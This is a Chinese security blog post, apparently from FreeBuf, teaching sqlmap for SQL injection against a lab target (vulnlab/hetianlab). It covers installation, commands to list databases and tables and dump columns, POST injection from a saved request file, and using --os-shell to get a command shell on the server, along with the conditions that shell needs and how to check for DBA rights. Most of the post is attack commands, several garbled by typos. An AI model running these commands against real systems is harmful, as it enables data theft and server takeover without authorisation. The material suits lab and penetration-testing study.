freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

sqlmap如何用dirsearch.py协助--os-shell拿到目标网站shell
2020-12-09 21:45:48

SQLMAP

sqlmap是一个开源渗透测试工具, 它可以自动检测和利用SQL注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。

安装

windows

  1. 安装python(2.x或3.x版本)
    https://www.python.org/downloads/
  2. 下载sq|map并解压
    http://sqlmap.org/
  3. 在sqlmap路径下打开cmd, python sqlmap.py

Linux

  1. kali系统自带
  2. git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap -dev

常用命令

sqlmap.py -u "url"检测目标url是否存在注入

sqlmap -u "url" --dbs爆出所有数据库信息

sqlmap -u "ur!" --current-db爆出当前数据库信息

sqlmap -u "url" -D Database_ name -tables列出指定库名的所有表名

sq|map -u "url" -D Database_ name -T Table_ name --columns列出指定库名指定表名的所有列名

sqlmap -u "url" -D Database_ name -T Table_ name -C columns1,colunms2, columns3 --dump列出指定库名指定表名指定字段的数据

POST注入

sqlmap -r /root/aaa.txt --dbs --batchsqlmap -r /root/aa.txt --current-dbsqImap -r /root/aaa.txt -D hetianlab --tablessqlmap -r /root/aaa.txt -D hetianlab -T user_ pwd --dump

细说--os-shell

sqlmap -r /root/aaa.txt -p id --is-dba

sqlmap -r /rootaaa.txt -p id --os-shell

os-shell的执行条件有三个:

  1. 网站必须是root权限
  2. 攻击者需要知道网站的绝对路径
  3. GPC为off, php主动转义的功能关闭

当着三个条件都满足的时候,--os-shell命令才执行。

which web application Language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default ) #默认

what do you want to use for writable directory?

[1] common Location(s) ( /var/ww/, /var/www/html, /var /www/htdocs, /usr/Local/ apache2/htdocs,/usr/local/www/data, /var/apache2/htdocs, /var/www/ nginx- default, /srv/www/htdocs') (default)

[2] custom Location(s) #自定义

[3] custom directory list file [4] brute force search

话说回来,我们如何知道这个网站是不是root权限呢?

我们可以执行以下两个命令来查看网站当前的用户

sqLmap -u "http://172 .26.2.36/vulnlab/ index . php?id=1" --current -usercurrent --user查看当前的用户

sqLmap -u "http://172 .26.2.36/vulnlab/ index . php?id=1" --is -dba指定去查找这个文件是否为dba,dba是databaseadmin,是数据库管理员用户的意思,如果返回值为true,则是root用户 这两个命令都可以

# SqlMap # 上传漏洞 # Getshell # sqlmap payload # 目录扫描
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者